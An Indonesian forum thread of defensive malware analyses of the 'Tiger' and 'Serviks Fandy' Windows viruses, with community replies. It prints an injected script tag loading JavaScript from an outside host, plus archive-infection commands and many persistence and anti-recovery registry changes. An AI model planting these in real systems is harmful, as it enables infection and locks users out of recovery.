(http://i41.servimg.com/u/f41/17/11/92/75/new_pi43.jpg)

Selain booter.exe, file sementara di C: ini juga mungkin menggunakan nama CONFIG.exe dan boottemp.exe yang bisa dilihat dari String file setup.exe, booter.exe, file Dll palsu maupun file Exe yang terinfeksi:
Sorry but you are not allowed to view spoiler contents.
Ada beberapa file hasil infeksi yang masih bisa berjalan dan ada juga yang sama sekali tidak bisa berjalan dengan menampilkan pesan error sebagai berikut:
Sorry but you are not allowed to view spoiler contents.
Terkadang juga menimbulkan proses error bahwa sistem Windows sedang bermasalah karena aksi infeksi tersebut:
Sorry but you are not allowed to view spoiler contents.
Sementara ini banyak Anti Virus yang sudah mendeteksi (http://www.virustotal.com/file-scan/report.html?id=d06fee36900b52ddb16d74153d86e5e59549abb68d6ca7909994cef7d3003135-1326177797) file exe hasil infeksi ini sebagai virus. Tetapi belum banyak Anti Virus yang bisa menyembuhkan file Exe yang terinfeksi ini, kebanyakan langsung menghapusnya. Selain file aplikasi, virus ini juga menginfeksi file ASP, ASPX,  HTM, HTML dengan menambahkan script pada bagian footernya:
Kutip
<script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script>

Dengan tujuan ketika user menjalankan Script ASP, ASPX,  HTM, HTML yang dibukanya, maka komputer korban akan ternfeksi karena Script tersebut akan menjalankan javascript tongji.js (ketika terhubung dengan internet). Satu inovasi yang digunakan oleh virus ini adalah dia bisa menginfeksi file HTM, HTML, ASP, ASPX yang terkompres dalam bentuk rar (WinRAR archive). Untuk tujuan ini, virus menggunakan bantuan Rar.exe pada lokasi C:\Program Files\WinRAR untuk mengekstrak isi file rar target ke folder Temporary (C:\WINDOWS\TEMP) dengan Command berikut:
Kutip
"[Lokasi Rar.exe]" X -ibck "[Lokasi File RAR Target]" "C:\WINDOWS\TEMP\"

Selanjutnya akan menginfeksi file HTM, HTML, ASP, ASPX yang telah diekstrak ke folder Temporary tadi dan terakhir akan menggunakan kembali Rar.exe untuk mengkompres kembali seluruh file ini ke dalam bentuk rar dengan nama yang sama dan mengganti file rar target dengan file rar yang telah dibuatnya tadi dengan Command berikut:
Kutip
"[Lokasi Rar.exe]" M -ibck -r -o+ -ep1 "[Lokasi File RAR Target]" "C:\WINDOWS\TEMP\[Nama File RAR Target]\*"

Sorry but you are not allowed to view spoiler contents.
Selanjutnya akan menginfeksi file HTM, HTML, ASP, ASPX yang telah diekstrak ke folder Temporary tadi dan terakhir akan mengkompres kembali seluruh file ini ke dalam bentuk rar dengan nama yang sama dan mengganti file rar target dengan file rar yang telah dibuatnya tadi. Untuk itu, biasakan anda membuat password pada file kompresan.

Contoh: Jika virus ini mengincar Flash Defender.rar pada lokasi D:\Software, maka Commandnya akan berisi:
Kutip
"C:\Program Files\WinRAR\Rar.exe" X -ibck "D:\Software\Flash Defender.rar" "C:\WINDOWS\TEMP\"
Kutip
"C:\Program Files\WinRAR\Rar.exe" M -ibck -r -o+ -ep1 "D:\Software\Flash Defender.rar" "C:\WINDOWS\TEMP\Flash Fefender\*"

Sorry but you are not allowed to view spoiler contents.
Tetapi untuk file-file kompres yang ber-password tidak akan terinfeksi. Untuk itu, biasakan dari sekarang untuk membuat password pada file yang dikompres terutama yang didalamnya berisi file-file yang penting. Cukup menerapkan password yang sama untuk semuanya sehingga mudah diingat. Virus ini menyebar pada flash disk dengan membuat file setup.exe di dalam folder recycle.{645FF040-5081-101B-9F08-00AA002F954E} dan juga file autorun.inf yang isi tulisan di dalamnya adalah sebagai berikut:
Sorry but you are not allowed to view spoiler contents.

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi48.jpg)

Yang mana fungsi autorun.inf ini adalah agar setup.exe dapat berjalan otomatis jika user membuka Flash Disk tersebut.
[/quote]
[/spoiler]

Ya, info yang bagus, thq.
Hmm, seingat saya ini lebih dulu ada loh dibanding Ramnit, waktu itu saya ketemu di warnet yang memerlukan jasa saya.
Hmm, sbnarnya sudah msuk DB Smadav atau belum ya?!
Judul: Re: Bedah Virus Disini !
Ditulis oleh: sang pada Januari 12, 2012, 09:13:52 AM
wow ternyata selain ramnit sudah ada terlebih dahulu virus ini ya sob.. bener bener ya perkembangan varian virus semakin berkembang seolah terus saling mengejar dengan antivirus.. :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 12, 2012, 10:47:23 AM
Kutip
Ya, info yang bagus, thq.
Sama2 gann.. :)
Kutip
Hmm, seingat saya ini lebih dulu ada loh dibanding Ramnit
Iyaa.. Bener.. Ramnit mewabah di tahun 2011 sedangkan Tiger di tahun 2010. Akan ane perbaiki kalimat bahwa Tiger terinspirasi Ramnit.. Trims atas masukannya..
Kutip
Waktu itu saya ketemu di warnet yang memerlukan jasa saya.
Sewaktu agan ke Warnet kemarin, apakah mereka meminta membersihkan virus ini juga? Kalo iya, mohon dibagi pengalaman bagaimana cara agan membersihkannya..  ^:)^
Kutip
Hmm, sbnarnya sudah msuk DB Smadav atau belum ya?![
Ane rasa belum gann.. Karena Smadav belum mendeteksi file EXE yang sudah terinfeksi virus ini..
Smadav hanya mendeteksi tularannya di FD aja.. Yang terdeteksi sebagai QVod A. Setelah ane cari-cari info mengenai QVod A, tingkah lakunya agak berbeda dari virus ini.
Jadi, ane menyimpulkan Smadav mendeteksi virus ini masih berdasarkan Teknik Heuristic, bukan berdasarkan Databasenya.. CMIIW.. ^:)^

@sang: Iya gann.. Mesti kita mesti berhati-hati.. 8)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: ponco wiibowo pada Januari 12, 2012, 02:24:02 PM
tempo hari gw juga pernah gan upload sample yg berbentuk icon Qvod installer apa mungkin ini variannya  ??? ???
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 12, 2012, 02:33:21 PM
tempo hari gw juga pernah gan upload sample yg berbentuk icon Qvod installer apa mungkin ini variannya  ??? ???
Yang iconnya seperti ini yahh gann?

(http://www.virusindonesia.com/wp-content/uploads/2011/12/icon.png)

Mungkin juga virus Tiger ini terinspirasi dari Qvod gann.. Tapi ane gak tau apa ini varian Qvod atau bukan..
Judul: Re: Bedah Virus Disini !
Ditulis oleh: ponco wiibowo pada Januari 12, 2012, 02:47:23 PM
tempo hari gw juga pernah gan upload sample yg berbentuk icon Qvod installer apa mungkin ini variannya  ??? ???
Yang iconnya seperti ini yahh gann?

(http://www.virusindonesia.com/wp-content/uploads/2011/12/icon.png)

Mungkin juga virus Tiger ini terinspirasi dari Qvod gann.. Tapi ane gak tau apa ini varian Qvod atau bukan..

mungkin jg ya gan. sampe2 , tetangga sebelah bebek kuning jg membuat tools Qvod express tuh gan  :D karna bnyak variannya
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 12, 2012, 02:54:38 PM
Kutip
mungkin jg ya gan. sampe2 , tetangga sebelah bebek kuning jg membuat tools Qvod express tuh gan   karna bnyak variannya

Iyaa gann.. Gambar ini juga ane ambil dari tetangga sebelah itu.. ;D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: ARRe pada Januari 12, 2012, 11:22:07 PM
Kutip
Akhirnya postingan ini selesai juga setelah sekian lama ane bergadang.. :P
Baru-baru ini Smadav mendapat sampel virus ini dari rekan ARRe di sini (http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/1030/) (sebenarnya sudah lama juga ;D) yang berarti virus ini sudah mulai menyebar di Indonesia.
. . . . . . . .
. . .
salut buat agan  :-bd :-bd :-bd
benar2 sampai tuntas & sedetil-detilnya...  :-bd :-bd :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 12, 2012, 11:39:25 PM
Kutip
salut buat agan  :-bd :-bd :-bd
benar2 sampai tuntas & sedetil-detilnya...  :-bd :-bd :-bd
Trimss gann..  ;)
Banyak dibantu artikel-artikel yang berbahasa mandarin juga sihh (bantuan Google Translate tentunya ;D). Makanya bisa sedetil ini..  ;D

Okee gann.. Mampir ke sini lagi yahh kalo ketemu file-file yang mencurigakan lagi.. :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada Januari 13, 2012, 10:22:47 AM
Kutip
Ya, info yang bagus, thq.
Sama2 gann.. :)
Kutip
Hmm, seingat saya ini lebih dulu ada loh dibanding Ramnit
Iyaa.. Bener.. Ramnit mewabah di tahun 2011 sedangkan Tiger di tahun 2010. Akan ane perbaiki kalimat bahwa Tiger terinspirasi Ramnit.. Trims atas masukannya..
Kutip
Waktu itu saya ketemu di warnet yang memerlukan jasa saya.
Sewaktu agan ke Warnet kemarin, apakah mereka meminta membersihkan virus ini juga? Kalo iya, mohon dibagi pengalaman bagaimana cara agan membersihkannya..  ^:)^
Kutip
Hmm, sbnarnya sudah msuk DB Smadav atau belum ya?![
Ane rasa belum gann.. Karena Smadav belum mendeteksi file EXE yang sudah terinfeksi virus ini..
Smadav hanya mendeteksi tularannya di FD aja.. Yang terdeteksi sebagai QVod A. Setelah ane cari-cari info mengenai QVod A, tingkah lakunya agak berbeda dari virus ini.
Jadi, ane menyimpulkan Smadav mendeteksi virus ini masih berdasarkan Teknik Heuristic, bukan berdasarkan Databasenya.. CMIIW.. ^:)^

@sang: Iya gann.. Mesti kita mesti berhati-hati.. 8)

Oke, good.

Untuk pembersihan sih, waktu itu saya tidak bawa peralatan lengkap, dan waktu itu saya hanya sebentar saja disana, karena saya ada kerjaan jadi PHL di Kepolisian (tebak jadi apa? :D. Toteeet.... Owh, iya benar, Cleaning Service. Hehe. :D ).


Nanti deh kalau ada waktu senggang untuk iseng akan saya coba bedah lagi di Lab.
;)

Oh iya, AV apa ya yang sudah bisa ngeheal tu virus? :)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 14, 2012, 06:32:28 PM
Kutip
Untuk pembersihan sih, waktu itu saya tidak bawa peralatan lengkap, dan waktu itu saya hanya sebentar saja disana, karena saya ada kerjaan jadi PHL di Kepolisian (tebak jadi apa? . Toteeet.... Owh, iya benar, Cleaning Service. Hehe.  ).
Masa Cleaning Service c gann? Kagak percaya..  ;D
Berarti agan uda banyak dapat job untuk clean Virus yahh? Wahh.. Ane boleh berguru yah ntar..  ^:)^
Kutip
Nanti deh kalau ada waktu senggang untuk iseng akan saya coba bedah lagi di Lab.
Oke gann.. Trims sebelumnya..  :-bd
Btw LAB yang agan maksud itu LABnya Smadav yah? Ato LAB dari agan sendiri? ;)
Kutip
Oh iya, AV apa ya yang sudah bisa ngeheal tu virus?
Ane juga sedang cari tahu gann.. Kyknya susah untuk repair file-file yang terinfeksi oleh virus ini apalagi yang di dalam file RAR itu. Nanti ane kabari lagi yah gann kalo uda ketemu yang bisa nge-repair. Ane mo coba Download Dr.Web dulu, tapi besar bgt sizenya.. ;D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: arjunasupriyadi pada Januari 14, 2012, 10:35:48 PM
salut bos jastis..mohon ijin co past untuk menyebarkan ilmu ini.
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Jastis pada Januari 25, 2012, 02:16:02 AM
salut bos jastis..mohon ijin co past untuk menyebarkan ilmu ini.

silahkan :)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: arjunasupriyadi pada Januari 25, 2012, 11:25:48 AM
@ bro jastis : ilmu anda saya saring di forum bsi salemba jakarta.
banyak dari rekan saya yang mengucapkan terima kasih.
bravoo bro jastis
Judul: Re: Bedah Virus Disini !
Ditulis oleh: acongg pada Januari 25, 2012, 12:05:06 PM
@ bro jastis : ilmu anda saya saring di forum bsi salemba jakarta.
banyak dari rekan saya yang mengucapkan terima kasih.
bravoo bro jastis
oh ente anak bsi salemba mas bos  :D ane punya cewek anak sekretaris bsi salemba mas bos  :-bd
ngemeng2.. ulasan bedah virusnya Ki@mhu di thread Upload virus ke forum juga bagus tuh, malah selalu update  :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 28, 2012, 10:34:48 PM
@ bro jastis : ilmu anda saya saring di forum bsi salemba jakarta.
banyak dari rekan saya yang mengucapkan terima kasih.
bravoo bro jastis
oh ente anak bsi salemba mas bos  :D ane punya cewek anak sekretaris bsi salemba mas bos  :-bd
ngemeng2.. ulasan bedah virusnya Ki@mhu di thread Upload virus ke forum juga bagus tuh, malah selalu update  :-bd
Makasih gann.. Jadi  :-[ Ane..  =))
Kebetulan lagi ada waktu senggang gann.. Jadinya bisa update.. Belakangan ini ane agak sibuk gak jelas..
Jadi belum post apa2 tentang review viruss.. Padahal pengen bgt..  :'(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: arjunasupriyadi pada Januari 30, 2012, 11:38:36 AM
@ bro jastis : ilmu anda saya saring di forum bsi salemba jakarta.
banyak dari rekan saya yang mengucapkan terima kasih.
bravoo bro jastis
oh ente anak bsi salemba mas bos  :D ane punya cewek anak sekretaris bsi salemba mas bos  :-bd
ngemeng2.. ulasan bedah virusnya Ki@mhu di thread Upload virus ke forum juga bagus tuh, malah selalu update  :-bd
Makasih gann.. Jadi  :-[ Ane..  =))
Kebetulan lagi ada waktu senggang gann.. Jadinya bisa update.. Belakangan ini ane agak sibuk gak jelas..
Jadi belum post apa2 tentang review viruss.. Padahal pengen bgt..  :'(
ditunggu nih update tannya
Judul: Re: Bedah Virus Disini !
Ditulis oleh: acongg pada Januari 30, 2012, 11:43:21 AM
@ bro jastis : ilmu anda saya saring di forum bsi salemba jakarta.
banyak dari rekan saya yang mengucapkan terima kasih.
bravoo bro jastis
oh ente anak bsi salemba mas bos  :D ane punya cewek anak sekretaris bsi salemba mas bos  :-bd
ngemeng2.. ulasan bedah virusnya Ki@mhu di thread Upload virus ke forum juga bagus tuh, malah selalu update  :-bd
Makasih gann.. Jadi  :-[ Ane..  =))
Kebetulan lagi ada waktu senggang gann.. Jadinya bisa update.. Belakangan ini ane agak sibuk gak jelas..
Jadi belum post apa2 tentang review viruss.. Padahal pengen bgt..  :'(
Ngemeng2 mana tuh si anak Super Narsis (ponco wibowo) ga keliatan lagi batang idungnya  =)) , biasanya tuh anak rajin bener tiap hari olpoad virus  :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ki@mhu pada Januari 31, 2012, 03:21:03 PM
@arjunasupriyadi: Okee gann..  :-bd Trimss.. ;)
@acongg: Iya yahh.. Kemarin dia sempat ngabsen di sini sehabis plg liburan dari Bali..  ;D
Semoga ada yang dia upload nanti untuk bahan review..  ;D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: ponco wiibowo pada Pebruari 01, 2012, 12:04:15 PM
@ bro jastis : ilmu anda saya saring di forum bsi salemba jakarta.
banyak dari rekan saya yang mengucapkan terima kasih.
bravoo bro jastis
oh ente anak bsi salemba mas bos  :D ane punya cewek anak sekretaris bsi salemba mas bos  :-bd
ngemeng2.. ulasan bedah virusnya Ki@mhu di thread Upload virus ke forum juga bagus tuh, malah selalu update  :-bd
Makasih gann.. Jadi  :-[ Ane..  =))
Kebetulan lagi ada waktu senggang gann.. Jadinya bisa update.. Belakangan ini ane agak sibuk gak jelas..
Jadi belum post apa2 tentang review viruss.. Padahal pengen bgt..  :'(
Ngemeng2 mana tuh si anak Super Narsis (ponco wibowo) ga keliatan lagi batang idungnya  =)) , biasanya tuh anak rajin bener tiap hari olpoad virus  :D
kenapa ? kangen sm gw loe gan,,, >=) biarin aja gw narsis, emang kenyataan kok  <=)

@arjunasupriyadi: Okee gann..  :-bd Trimss.. ;)
@acongg: Iya yahh.. Kemarin dia sempat ngabsen di sini sehabis plg liburan dari Bali..  ;D
Semoga ada yang dia upload nanti untuk bahan review..  ;D

iya gan, gw mau upload virus nih,,, tunggu bentar lagi gw zip dolooo  <=)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Blue-Eyes pada Pebruari 06, 2012, 05:28:45 PM
Jangan smpai kena y Allah
Aminn ;)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: adiselian pada Pebruari 12, 2012, 09:39:21 AM
wah kudu di safe nih infonya buat jaga-jaga
Judul: Virus Serviks Fandy
Ditulis oleh: Ki@mhu pada Pebruari 23, 2012, 08:26:49 PM
(http://i41.servimg.com/u/f41/17/11/92/75/new_pi95.jpg)

Tipe Sampel: EXE
Size: 65,5 KB
MD5: 1e610e4f4d6c73db0973e2247b360f50
CRC32: b11432a2

Beberapa minggu yang lalu Saudara 3ndiixz (http://smadaver.com/profile/3ndiixz/) melakukan upload sampel virus di sini (http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/1120/) yang dikenali Smadav sebagai virus Fandy.
Sorry but you are not allowed to view spoiler contents.
Virus ini merupakan varian lain dari virus Serviks yang merupakan virus lokal yang juga sudah bisa dideteksi dan dibersihkan oleh antivirus lokal seperti Smadav. Tetapi varian virus yang satu ini sedikit berbeda dari virus lokal yang lain karena selain mengutak-atik Registry, virus ini juga mengganti (OverWrite) File HTM, HTML, OCX, dan PHP yang ada di dalam komputer korban menjadi file buatan virus ini (dengan ekstensi yang sama) sehingga sangat merugikan :(.

Aksi File
Virus ini akan membuat file berikut ini pada setiap Drive (C, D, E, dstnya..):

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi97.jpg)

- disk32dll.exe
- Autorun.inf, yang isinya:
Sorry but you are not allowed to view spoiler contents.
Fungsi autorun.inf ini adalah untuk menjalankan disk32dll.exe secara otomatis setiap korban mengakses Drive yang telah terjangkit virus ini ataupun hanya dengan mencolok USB Drive yang sudah terjangkit virus ini (melalui fitur autoplay).
- msvbvm60.dll
- f*** Of Malingsia.txt, yang isinya:
Sorry but you are not allowed to view spoiler contents.
- Lirik Lagu.doc, yang isinya:
Sorry but you are not allowed to view spoiler contents.

Selain itu, virus ini juga akan membuat file:
- screen.scr, serviks.exe, dan setup.exe di C:\windows
- run32dll.exe (bukan rundll32.exe milik windows), serviks.exe di C:\windows\system32
- File .ico di C:\windows\system32\Driver\Printer\LX300 (lihat gambar di bawah)

(http://i41.servimg.com/u/f41/17/11/92/75/new_p101.jpg)

- C:\Documents and Settings\All Users\Desktop\Foto Bugil.scr
- C:\Documents and Settings\All Users\Start Menu\Programs\Startup\system.exe (agar file system.exe ini dijalankan otomatis setiap User masuk (Log on) ke Windows)
File disk32dll.exe, Foto Bugil.scr, run32dll.exe, setup.exe, serviks.exe, screen.scr, system.exe ini merupakan file yang identik (mempunyai kode Hash yang sama).
- Membuat banyak sekali file HTM (berukuran 1 KB) berawal dari B4ND1T0.htm sampai dengan B4ND1T9995.htm (dengan pola kenaikan nomor yang tidak tentu) pada lokasi C:\WINDOWS
Sorry but you are not allowed to view spoiler contents.
Isi dari HTML yang dibuat virus ini:
Sorry but you are not allowed to view spoiler contents.
Selain membuat file pada komputer korban, virus ini juga mengganti (Overwrite) file berikut:
- Mengganti file berekstensi HTM dan HTML yang berada pada setiap Drive. Virus ini menggantinya dengan file HTM/HTML dengan nama dan ekstensi yang sama dengan file asli. Tetapi jika dibuka kembali, isinya sama persis dengan gambar di atas (juga berukuran 1 KB). Akan tetapi, virus ini tidak mengganti file HTM/HTML yang mempunyai folder pengikut (isi folder ini biasanya berupa file-file yang dibutuhkan oleh tampilan HMTL tersebut).

(http://i41.servimg.com/u/f41/17/11/92/75/new_p106.jpg)
File HTM/HTML yang diganti Virus Selalu berukuran 1 KB, perhatikan bahwa file Arc_furnace.htm tidak diganti karena mempunyai folder pengikut

- Mengganti file berekstensi PHP. Virus ini juga menggantinya dengan nama dan ekstensi yang persis sama dengan yang asli (juga berukuran 1 KB). Sewaktu file PHP dan KEY ini dibuka dengan Notepad, isinya sama persis dengan Source Code HTML yang dibuat virus (yang telah diuraikan di atas):

Sorry but you are not allowed to view spoiler contents.

- Mengganti file berekstensi KEY dan OCX. Virus ini juga menggantinya dengan nama dan ekstensi yang persis sama dengan yang asli (juga berukuran 1 KB). Isi kedua file yang diganti ini sewaktu dibuka dengan Notepad:

(http://i41.servimg.com/u/f41/17/11/92/75/new_p108.jpg)

Termasuk juga file-file OCX yang berada di C:\windows dan C:\windows\system32 juga diganti sehingga memunculkan peringatan berikut:

(http://i41.servimg.com/u/f41/17/11/92/75/new_p109.jpg)


Aksi Registry

Value yang dibuat:

- HKEY_CLASSES_ROOT\scrfile\DefaultIcon,
@="SHELL32.dll,3"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scrfile\DefaultIcon,
@="SHELL32.dll,3"
Value ini dibuat untuk mengganti ikon file SCR dari ikon berbentuk aplikasi menjadi ikon berbentuk folder:

(http://i41.servimg.com/u/f41/17/11/92/75/new_p116.jpg)

- HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,
Window Title="Serviks Explorer"
Value ini dibuat untuk mengganti nama Microsoft Internet Explorer/Windows Internet Explorer menjadi Serviks Explorer:

(http://i41.servimg.com/u/f41/17/11/92/75/new_p111.jpg)

- Memblok Command Prompt, Task Manager, Regedit, Klik kanan (pada Desktop maupun Taskbar), Memghilangkan Folder Options, Run & Search (pada Start Menu) dengan membuat value:
Sorry but you are not allowed to view spoiler contents.
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SystemFileProtection,
ShowPopups=0

- HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore,
DisableConfig=1
DisableSR=1
Value ini dibuat untuk mematikan System Restore dan mencegah korban untuk mengaktifkannya kembali.

- HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer,
DisableMSI=1
LimitSystemRestoreCheckpointing=1
Value ini dibuat untuk me-nonaktifkan file yang berekstensi MSI (Microsoft Windows Installer) dan mencegah Windows membuat Restore Point sewaktu menjalankan file MSI tersebut

- Membuat value berikut sehingga setiap kali korban masuk ke Windows, akan menjalankan secara otomatis file-file aplikasi yang telah dibuatnya:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,
Microsoft Serviks="C:\WINDOWS\serviks.exe"
Windows Serviks="C:\WINDOWS\system32\serviks.exe"
Run32dll="C:\WINDOWS\system32\run32dll.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
Back Up Disk="D:\disk32dll.exe"
Setup="C:\WINDOWS\setup.exe"
Sorry but you are not allowed to view spoiler contents.
Selain itu, virus ini juga membuat value untuk menjalankan otomatis suatu file. Tetapi file yang dituju oleh value ini sebenarnya tidak ada dan juga tidak dibuat oleh virus ini sendiri. Saya sendiri kurang jelas apa tujuannya.. Tetapi saya bisa menyimpulkan bahwa value berikut ini (sama persis) juga dibuat oleh varian virus serviks yang lain (seperti Serviks Kiddrock). Hanya saja pada varian virus yang lain, value ini dibuat menuju kepada file aplikasi yang memang ada, sedangkan pada varian yang ini filenya tidak ada sama sekali:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,
MSMSGS=C:\WINDOWS\Application Data\WINDOWS\WINLOGON.EXE
Service=C:\WINDOWS\Application Data\WINDOWS\SERVICES.EXE

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
Logon="\Application Data\WINDOWS\CSRSS.EXE"
System Monitoring="\Application Data\WINDOWS\LSASS.EXE"

- Mengganggu Service Windows seperti McAfee, Norton, Symantec, dan System Restore sehingga aplikasi tersebut tidak bisa berjalan sebagaimana semestinya tetapi sebagai gantinya akan mengaktifkan salah satu file virus (serviks.exe) setiap Service ini dijalankan. Untuk tujuan ini, virus mengubah Value berikut menjadi:
Sorry but you are not allowed to view spoiler contents.
Value yang diubah:

- Tidak bisa membuka/menjalankan file BAT, COM, INF, INI, PIF, VBE, VBS. Dan apabila keenam tipe file ini tetap dijalankan, maka secara otomatis akan mengaktifkan salah satu file virus serviks.exe. Untuk tujuan ini, virus mengubah:
Sorry but you are not allowed to view spoiler contents.
- Mengubah tipe file berekstensi EXE dari Application menjadi Serviks Corporation dengan mengubah:
HKEY_CLASSES_ROOT\exefile, @
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile, @
Dari "Application" menjadi "Serviks Corporation"

- Mengubah tipe file berekstensi file SCR dari Screen Saver menjadi File Folder
HKEY_CLASSES_ROOT\scrfile, @
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scrfile, @
Dari "Screen Saver" menjadi "File Folder"

- Mengubah Home Page dan Local Page Internet Explorer menjadi salah satu file HTM (B4ND1T[Nomor Urut].htm) yang telah dibuat virus di dalam folder C:\WINDOWS (seperti yang telah telah diuraikan diatas). Untuk tujuan ini virus ini mengubah:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,
Local Page menjadi "C:\WINDOWS\B4ND1T[Nomor Urut].htm"
Start Page menjadi "C:\WINDOWS\B4ND1T[Nomor Urut].htm"

Menyembunyikan Ekstensi file, menyembunyikan file beratribut Hidden, dan menyembunyikan file beratribut System dengan mengubah value berikut:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced dan HKEY_USERS\[User]\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Hidden menjadi 2
HideFileExt menjadi 1
ShowSuperHidden menjadi 0

(http://i41.servimg.com/u/f41/17/11/92/75/new_p112.jpg)

Virus ini juga mengubah value berikut ini:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder, HideFileExt
UncheckedValue menjadi 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder, SuperHidden
UncheckedValue menjadi 0

Dengan tujuan agar User tidak bisa membuang centangan Hide ekstensions for known file types dan Hide protected operating system files melalui Folder Options. Setiap kali User berusaha membuang centangannya (dengan harapan untuk menampilkan ekstensi file dan menampilkan file-file yang beratribut System), centangannya selalu muncul kembali. Jadi, User tidak akan pernah bisa melihat file-file induk virus ini karena semua filenya beratribut Hidden dan System.

Tidak seperti kebanyakan virus yang lain, virus ini tidak mengubah UncheckedValue pada [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] sehingga User tetap bisa dengan bebas mengganti settingan Hidden files and folders (Do not show hidden files and folders ataupun show hidden files and folders) dalam menampilkan/melihat file-file yang di-Hidden. Tetapi dengan inipun, User tetap tidak bisa melihat file beratribut System sehingga file-file induk virusnya (yang sengaja dibuat beratribut System) tetap tidak bisa kelihatan.

- Mengubah Nama Pemilik Windows menjadi 4ND1 PR06R4M3R dan organisasi pemilik Windows menjadi V-Maker. Untuk tujuan ini, virus ini mengubah:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion,
RegisteredOrganization menjadi "V-Maker"
RegisteredOwner menjadi "F4ND1 PR06R4M3R"

(http://i41.servimg.com/u/f41/17/11/92/75/new_p114.jpg)

- Mengaktifkan kembali fitur Autoplay walaupun telah dimatikan oleh User agar Virus (virus yang sedang dibahas ini ataupun virus lainnya) dapat masuk ke komputer korban sewaktu USB Drive yang telah terinfeksi oleh virus dicolokkan ke Port USB walaupun korban belum membuka isi Drive USB tersebut. Untuk tujuan ini, virus ini mengubah:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun
HKEY_USERS\[USER]\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun
Menjadi 1 (Seharusnya 255 agar fitur autoplay tidak berjalan).

- Mengubah value berikut dengan harapan agar file IExplorer.exe aktif setiap kali user log on ke Windows.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell
Dari "Explorer.exe" menjadi "Explorer.exe "C:\WINDOWS\system32\IExplorer.exe""

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Userinit
Dari "C:\WINDOWS\system32\userinit.exe," menjadi "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\IExplorer.exe"

Tetapi file IExplorer.exe ini sebenarnya tidak dibuat oleh varian virus serviks yang ini (sedangkan pada varian virus serviks yang lain, file ini tetap dibuat) sehingga memunculkan pesan error berikut saat User melakukan log on:

(http://i41.servimg.com/u/f41/17/11/92/75/new_pi53.jpg)

- Mengubah Value berikut ini untuk mengaktifkan Shell.exe sewaktu komputer User melakukan Debugg saat terjadi Error. Tetapi file Shell.exe ini tidak dibuat oleh varian Serviks yang ini sehingga tidak berpengaruh terhadap keamanan komputer User.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug, Debugger
Dari "drwtsn32 -p %ld -e %ld -g" menjadi "C:\WINDOWS\system32\Shell.exe"

==> Lanjut Di Bawah Karena Karakter terlalu banyak  :) <==
Judul: Re: Bedah Virus Disini !
Ditulis oleh: payjho pada Pebruari 23, 2012, 08:30:04 PM
nice post gan !! +1 dah  :-bd

sekalian cara bantai manualnya donk, biar nubie2 kyk ane tambah paham :)
Judul: Virus Serviks Fandy
Ditulis oleh: Ki@mhu pada Pebruari 23, 2012, 08:30:49 PM
==> Lanjutan dari Posting Virus Serviks sebelumnya <==

- Berusaha mengaktifkan File Virus serviks.exe sewaktu User Booting lewat "Safe mode with command prompt" dengan mengubah Value:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell
Dari "cmd.exe" menjadi "C:\WINDOWS\serviks.exe"

- Berusaha mengaktifkan File Virus serviks.exe saat komputer melakukan CHKDSK (Disk Error Checking) sewaktu melakukan Booting dengan mengubah value:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager, BootExecute
Dari "autocheck autochk *" menjadi "C:\WINDOWS\serviks.exe"

